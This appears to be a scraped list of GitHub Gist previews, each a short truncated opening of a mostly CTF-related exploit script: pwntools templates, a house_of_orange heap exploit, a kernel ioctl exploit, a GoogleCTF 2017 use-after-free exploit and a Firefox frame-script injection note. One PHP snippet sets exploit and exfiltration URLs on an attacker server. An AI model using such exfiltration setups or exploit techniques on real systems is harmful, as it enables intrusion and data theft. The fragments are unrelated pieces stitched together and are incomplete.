Let's make disassembler, easier.
Template with simplicity, let's keep it simple.
mov $reg, $reg
#!/usr/bin/env python2 | |
from pwn import * | |
### | |
if len(sys.argv) > 1: | |
DEBUG = False | |
else: | |
DEBUG = True |
$ gcc house_of_orange.c -o house_of_orange | |
house_of_orange.c: In function ‘main’: | |
house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
*(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */ | |
^ | |
house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion] | |
*(void **)(p1+0x80+0x30) = -1; | |
^ | |
$ ./house_of_orange |
<?php | |
$target = 'http://127.0.0.1/'; | |
$exploit = 'http://yourserver:1337/exploit.php'; | |
$exfil = 'http://yourserver:1337/FLAG='; | |
function enc($s) { | |
$res = ''; | |
for ($i = 0; $i < strlen($s); $i++) { | |
$res .= '\\' . dechex(ord($s[$i])); | |
} |
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh ) |
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
# p = Pwn(mode=1,port=8887) | |
p = Pwn(mode=1,host='52.193.196.17',port=56746) | |
def select(op): | |
p.read_until('Your choice: ') |
#include <stdio.h> | |
#include <string.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <fcntl.h> | |
#include <sys/wait.h> | |
#include <sys/ioctl.h> | |
#include <pthread.h> | |
#define ALLOC_CTX _IO('t', 1) |
from ctypes import c_ssize_t, c_void_p, c_int, c_void_p, create_string_buffer, cast, WINFUNCTYPE, CFUNCTYPE, windll, cdll, CDLL | |
from PyQt5.QtCore import Qt, QTimer, QObject | |
from PyQt5.QtGui import QResizeEvent, QFocusEvent | |
from PyQt5.QtWidgets import QWidget, QDialog, QDialogButtonBox, QPushButton, qApp | |
import os | |
import sys | |
import idaapi | |
import idc |
/* inject via | |
ppmm.loadFrameScript("data:,<js source>", true); | |
(where ppmm is the message manager, e.g. in shell.js) | |
framescript documentation explains why this works[1] and | |
the message manager docs[2] explain that the parent process | |
manager defined as ppmm in shell.js[3] can be used. | |
[1] https://developer.mozilla.org/en-US/Firefox/Multiprocess_Firefox/Frame_script_loading_and_lifetime |
#!/usr/bin/env python3 | |
# | |
# Exploit for "assignment" of GoogleCTF 2017 | |
# | |
# CTF-quality exploit... | |
# | |
# Slightly simplified and shortened explanation: | |
# | |
# The bug is a UAF of one or both values during add_assign() if a GC is | |
# triggered during allocate_value(). The exploit first abuses this to leak a |